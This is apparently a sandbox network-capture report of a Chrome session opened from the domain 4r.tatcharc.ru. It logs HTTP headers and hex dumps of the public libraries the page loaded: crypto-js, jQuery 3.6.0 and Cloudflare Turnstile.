                                                                                                        2024-12-18 17:49:06 UTC1369INData Raw: 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57
                                                                                                        Data Ascii: 4);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVW
                                                                                                        2024-12-18 17:49:06 UTC1369INData Raw: 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61 73 68
                                                                                                        Data Ascii: +1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._hash
                                                                                                        2024-12-18 17:49:06 UTC1369INData Raw: 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29 2c 62
                                                                                                        Data Ascii: ,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),b


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.749784151.101.66.1374439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:49:05 UTC620OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                        Host: code.jquery.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://4r.tatcharc.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:49:05 UTC635INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 89501
                                                                                                        Server: nginx
                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                        ETag: "28feccc0-15d9d"
                                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                        Fastly-Restarts: 1
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Wed, 18 Dec 2024 17:49:05 GMT
                                                                                                        Age: 3065678
                                                                                                        X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890089-NYC
                                                                                                        X-Cache: HIT, HIT
                                                                                                        X-Cache-Hits: 9196, 260
                                                                                                        X-Timer: S1734544146.825997,VS0,VE0
                                                                                                        Vary: Accept-Encoding
                                                                                                        2024-12-18 17:49:05 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                        2024-12-18 17:49:05 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                        Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                        2024-12-18 17:49:05 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                        Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                        2024-12-18 17:49:05 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                        Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                        2024-12-18 17:49:05 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                        Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                        2024-12-18 17:49:05 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                        Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                        2024-12-18 17:49:05 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                        Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                        2024-12-18 17:49:06 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                        Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                        2024-12-18 17:49:06 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                        Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                        2024-12-18 17:49:06 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                        Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.749785104.18.95.414439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:49:07 UTC645OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://4r.tatcharc.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:49:07 UTC471INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 17:49:07 GMT
                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                        Content-Length: 47692
                                                                                                        Connection: close
                                                                                                        accept-ranges: bytes
                                                                                                        last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                        access-control-allow-origin: *
                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f40fcd9bc13de93-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 17:49:07 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                        Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                        2024-12-18 17:49:07 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                        Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                        2024-12-18 17:49:07 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                        Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
